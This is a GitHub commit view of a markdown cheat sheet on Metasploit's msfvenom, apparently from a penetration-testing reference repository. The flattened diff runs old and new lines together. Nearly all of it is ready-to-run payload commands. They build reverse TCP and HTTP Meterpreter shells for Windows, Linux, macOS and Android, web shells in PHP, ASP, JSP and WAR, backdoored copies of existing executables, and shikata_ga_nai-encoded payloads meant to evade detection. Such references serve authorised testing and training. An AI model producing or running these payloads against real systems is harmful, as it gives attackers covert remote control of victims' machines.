Update msfvenom.md

This commit is contained in:
Omar Santos 2021-07-18 23:16:48 -04:00 committed by GitHub
parent c626bd13b7
commit 8fddec29a1
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -2,39 +2,81 @@
MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode. MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode.
## Creting Binaries ## Creating Binaries
- `msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe` The following create different binaries for meterpreter and reverse TCP shells:
- Creates a simple TCP Payload for Windows
- `msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe` ### Creates a Reverse TCP Meterpreter Shell - Payload for Windows
- Creates a simple HTTP Payload for Windows
- `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf` ```
- Creates a simple TCP Shell for Linux msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f exe > payload.exe
- `msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho` ```
- Creates a simple TCP Shell for Mac
- `msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk` ### Creates a simple HTTP Payload for Windows
- Creates a simple TCP Payload for Android ```
msfvenom -p windows/meterpreter/reverse_http LHOST={HOST/IP} LPORT={PORT} -f exe > payload.exe
```
### Creates a simple TCP Shell for Linux
```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f elf > payload.elf
```
### Creates a simple TCP Shell for Mac
```
msfvenom -p osx/x86/shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f macho > example.macho
```
### Creates a simple TCP Payload for Android
```
msfvenom -p android/meterpreter/reverse/tcp LHOST={HOST/IP} LPORT={PORT} R > example.apk`
```
## Web Payloads ## Web Payloads
Command Info
- `msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php` ### Creates a Simple TCP Shell for PHP
- Creates a Simple TCP Shell for PHP ```
- `msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp` msfvenom -p php/meterpreter_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f raw > example.php
- Creates a Simple TCP Shell for ASP ```
- `msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp`
- Creates a Simple TCP Shell for Javascript ### Creates a Simple TCP Shell for ASP
- `msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war` ```
- Creates a Simple TCP Shell for WAR msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f asp > example.asp
```
### Creates a Simple TCP Shell for Javascrip
```
msfvenom -p java/jsp_shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f raw > example.jsp
```
### Creates a Simple TCP Shell for WAR
```
msfvenom -p java/jsp_shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f war > example.war
```
## Windows Payloads ## Windows Payloads
- `msfvenom -l encoders` ### Lists all avalaible encoder
- Lists all avalaible encoders ```
- `msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe` msfvenom -l encoders
- Binds an exe with a Payload (Backdoors an exe) ```
- `msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b \x00 -i 3 -f exe > example.exe`
- Creates a simple TCP payload with shikata_ga_nai encoder ### Binds an exe with a Payload (Backdoors an exe)
- `msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe` ```
- Binds an exe with a Payload and encodes it msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f exe > example.exe
```
### Creates a simple TCP payload with shikata_ga_nai encoder
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -e x86/shikata_ga_nai -b \x00 -i 3 -f exe > example.exe
```
### Binds an exe with a Payload and encodes it
```
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe
```
## Getting a Metepreter Shell ## Getting a Metepreter Shell
``` ```